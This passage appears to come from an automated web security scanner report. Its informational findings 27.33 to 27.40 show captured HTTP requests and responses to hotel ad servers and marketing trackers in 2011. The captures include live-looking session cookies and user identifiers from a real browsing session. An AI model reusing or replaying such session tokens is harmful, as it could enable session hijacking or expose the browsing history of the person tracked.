Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.3.4038.33275 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=INFOSITE&PLACEMENT=CCOL1&DEST=BOS&LANGID=1033&ADSIZE=300x250&NUMCHILDREN=0&STAR=40&REGION=US.CA&BRAND=Omni&DAYSUNTILSTART=1&IPGEO=807
...[SNIP]...

27.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=760f623e-aac2-41c7-afce-35fce14d824d&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=760f623e-aac2-41c7-afce-35fce14d824d&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=760f623e-aac2-41c7-afce-35fce14d824d&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.3.4038.33275 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE&tile=76
...[SNIP]...

27.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=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.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:35 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe004:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:02:35 GMT
Pragma: no-cache
Content-Length: 1275
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLBOT&DEST=BOS&LANGID=1033&TILE=a2b6cae1-2502-4924-b0ae-59b5ac2019b7&ADSIZE=160x600&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYS
...[SNIP]...

27.35. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=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.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:28 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:00:28 GMT
Pragma: no-cache
Content-Length: 538
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAY
...[SNIP]...

27.36. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:10 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe002:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 00:09:10 GMT
Pragma: no-cache
Content-Length: 536
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYS
...[SNIP]...

27.37. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=1394b05b-303b-4e18-8e3a-6c1de94b012e&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=1394b05b-303b-4e18-8e3a-6c1de94b012e&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=1394b05b-303b-4e18-8e3a-6c1de94b012e&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A196.1.0%3A92.0.0.i1%3A121.503.0.i7%3A195.0.0%3A104.0.1%7CHCOM_US; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: 12-May-2001 12:28:18 GMT
Content-Type: text/html

<!-- v1.3.4038.33275 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE&tile=13
...[SNIP]...

27.38. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.hotels.com
Path:   /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

Request

GET /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE HTTP/1.1
Host: media.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search/search.html?cd=10-14-11&dd=10-16-11&hid=205543&nr=1&pn=1&r=2&rl=destination%3A1401516%3APROVIDED%3APROVIDED&vt=LIST
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; SSID=BQD8fxscAAAAAAAp_YhOsO4QAin9iE4CAAAAAAAAAAAAiAmJTgCCAAABgwQAAIgJiU4BAIcAAAG0BAAAiAmJTgEA; SSSC=3.G5659051284361178800.2|130.1155:135.1204; SSRT=iAmJTgA; SESSID=1E7124089B9B31810B6A337085BAE51F.hm07tc02; channel=DC; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/14/11//10/16/11//2//MM/dd/yy//1401516"; mvthistory=185.0.0.i1%3A114.1.0%3A124.1.0.i1%3A103.4.1.i6%3A171.1.0%3A130.1.1.i2%3A48.1.0%3A97.73.1.i3%3A98.6.4%3A142.0.0.i4%3A198.2.0%3A145.0.0.i2%3A200.0.0%3A137.0.0.i2%3A108.1.0.i2%3A190.3.0%3A152.0.0.i2%3A134.0.1%3A196.1.0%3A2.2.1%3A209.0.1%3A147.6.0.i6%3A92.0.0.i1%3A121.503.0.i7%3A132.2.0.i2%3A122.1.0.i3%3A138.1.0%3A149.0.0.i1%3A104.0.1%3A195.0.0%7CHCOM_US; SSLB=1; user=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.; SSPV=HjwAAAAAAAEAAAAAAAAAAAAAAAIAAAAAAAA; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:04:26 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_python/3.3.1 Python/2.7.1
AdServer: chesrvdfe003:9678:1
Cache-Control: max-age=0
Expires: Mon, 03 Oct 2011 01:04:26 GMT
Pragma: no-cache
Content-Length: 1251
Content-Type: text/html

<!-- 2.0.1.68 /html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLTOP&DEST=BOS&LANGID=1033&TILE=7ce342f7-365e-492f-ba94-228afb470dfc&ADSIZE=180x150&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYS
...[SNIP]...

27.39. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Hotwire/retargeting_hotel_results@Bottom3 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/results.jsp?searchTokenId=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Mon, 03-Oct-2011 00:42:26 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Hotwire/retargeting_hotel_results/1851685626/Bottom3/default/empty.gif/4d686437616b364a424c59414378714a?" target="_top"><IMG SRC=
...[SNIP]...

27.40. http://now.eloqua.com/visitor/v200/svrGP.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=2598&ref2=http%3A//www.manutd.com/en/Club/Sponsors.aspx%3Fsponsorid%3D%7BF745DA14-CB5E-4A81-816A-8DB410E47A75%7D&tzo=360&ms=133 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.aon.com/default.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
